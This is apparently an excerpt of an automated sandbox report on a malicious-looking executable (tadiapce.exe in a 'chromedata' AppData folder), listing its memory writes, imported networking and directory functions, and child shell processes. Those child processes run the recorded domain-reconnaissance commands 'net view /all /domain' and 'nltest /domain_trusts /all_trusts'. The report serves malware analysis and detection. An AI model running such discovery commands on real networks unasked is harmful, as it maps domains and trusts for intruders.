| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 8 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2dc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2e0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2e4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2e8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2ec, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2f0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2f4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2f8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2fc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f300, size = 4 |
|
1 |
Host Behavior
Module (94)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ACTIVEDS.dll | base_address = 0x6eb70000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x73c20000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76a60000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Get Handle | c:\windows\system32\msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Get Address | c:\windows\system32\activeds.dll | function = ADsOpenObject, address_out = 0x6eb716e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x76b5ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x76b5ba60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDBCSLeadByteEx, address_out = 0x76b74dad |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetCurrentDirectoryA, address_out = 0x76b5903d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsGetValue, address_out = 0x76b5da70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtect, address_out = 0x76b52341 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualQuery, address_out = 0x76b676d6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = __dllonexit, address_out = 0x76f8f509 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = __mb_cur_max, address_out = 0x77023148 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _amsg_exit, address_out = 0x76feb2ef |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _errno, address_out = 0x76f8a5b8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _initterm, address_out = 0x76f8c151 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _iob, address_out = 0x77022900 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _lock, address_out = 0x76f8a449 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _onexit, address_out = 0x76f9112d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf_s, address_out = 0x76f9141b |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = calloc, address_out = 0x76f8c456 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = fputc, address_out = 0x76ff87c3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x76f89894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = fwrite, address_out = 0x76f976ac |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = getenv, address_out = 0x76f9a419 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = localeconv, address_out = 0x76f906a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x76f89cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x76f89910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x76f89790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = setlocale, address_out = 0x76f95286 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x76f8dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strerror, address_out = 0x76fa7a18 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x76f943d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncmp, address_out = 0x76f8b443 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x76f908a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x76f8de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _unlock, address_out = 0x76f8a42d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = abort, address_out = 0x76fe8e53 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x76f8dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = vfprintf, address_out = 0x76ff7408 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = wcslen, address_out = 0x76f9d335 |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetApiBufferFree, address_out = 0x73c113d2 |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetServerEnum, address_out = 0x6f692f61 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitialize, address_out = 0x76ceb636 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = IIDFromString, address_out = 0x76ce2ff2 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = VariantClear, address_out = 0x76a63eae |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wvsprintfW, address_out = 0x76c2407a |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAGetLastError, address_out = 0x75a937ad |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x75a93ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x75a96a8a |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = closesocket, address_out = 0x75a93918 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = connect, address_out = 0x75a96bdd |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x75aa7673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = htons, address_out = 0x75a92d8b |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_addr, address_out = 0x75a9311b |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x75a9b131 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = ioctlsocket, address_out = 0x75a93084 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = recv, address_out = 0x75a96b0e |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = select, address_out = 0x75a96989 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = send, address_out = 0x75a96f01 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = setsockopt, address_out = 0x75a941b6 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = socket, address_out = 0x75a93eb8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _get_output_format, address_out = 0x76ff5cb8 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:34:05 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11084198 |
|
1 | |
| Get Time | type = Performance Ctr, time = 31421778633 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = SystemRoot, result_out = C:\Windows |
|
1 |
Process #54: cmd.exe
51
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c net view /all /domain |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:04:09, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd70 |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA4
|
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49df0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:34:14 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11093215 |
|
1 | |
| Get Time | type = Performance Ctr, time = 32322151602 |
|
1 |
Environment (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #56: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c nltest /domain_trusts |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:04:09, Reason: Child Process |
| Unmonitor | End Time: 00:04:11, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed0 |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EC8
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\nltest.exe | os_pid = 0xee8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49df0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:34:14 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11093402 |
|
1 | |
| Get Time | type = Performance Ctr, time = 32340853442 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #58: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c nltest /domain_trusts /all_trusts |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:04:09, Reason: Child Process |
| Unmonitor | End Time: 00:04:11, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf1c |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F10
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\nltest.exe | os_pid = 0x944, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49df0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
